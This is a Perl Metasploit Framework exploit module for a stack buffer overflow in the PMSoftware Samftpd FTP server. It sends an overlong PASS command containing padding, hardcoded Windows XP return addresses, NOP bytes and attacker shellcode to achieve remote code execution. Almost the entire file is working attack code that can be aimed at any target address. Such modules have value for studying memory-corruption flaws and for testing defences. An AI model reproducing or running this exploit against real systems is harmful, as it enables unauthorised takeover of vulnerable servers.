##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##
package Msf::Exploit::pmsoftware_samftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PMSoftware Samftpd Remote Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ '<redsand [at] blacksecurity.org>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'redsand0wnedj00'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
# 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the log handler of Samftpd
}),
'Refs' =>
[
['SA18574', 'secunia.com/advisories/SA18574'],
],
'DefaultTarget' => 0,
'Targets' =>
[
['SamFtpd PmSoftware.exe WinXP SP0/1 Eng.', 0x71ab7bfb],
['SamFtpd PmSoftware.exe WinXP SP2 Eng.', 0x77daaccf],
],
'Keys' => ['samftpd'],
'DisclosureDate' => 'Jan 25 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $header = "\x81\xc4\xff\xef\xff\xff\x44";
if (! $self->InitNops(30)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}
my $evil = ("PASS ");
$evil .= "A"x219;
$evil .= pack("V", $target->[1]) x 5 ;
$evil .= "\x90\x90" x 5; # little bit of padding
$evil .= $shellcode;
$evil .= "\x0a\x0d";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);
$self->PrintLine(sprintf ("[*] PMSoftware Samftpd Remote Exploit by redsand\@blacksecurity.org"));
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
#$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
my $r = $s->Recv(-1, 30);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
$self->PrintLine("[*] $r");
$self->PrintLine("[*] Login as " .$self->GetVar('USER'));
$s->Send("USER ".$self->GetVar('USER')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->PrintLine("[*] Sending evil buffer....");
$s->Send($evil);
#$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print("[*] $r");
return;
}
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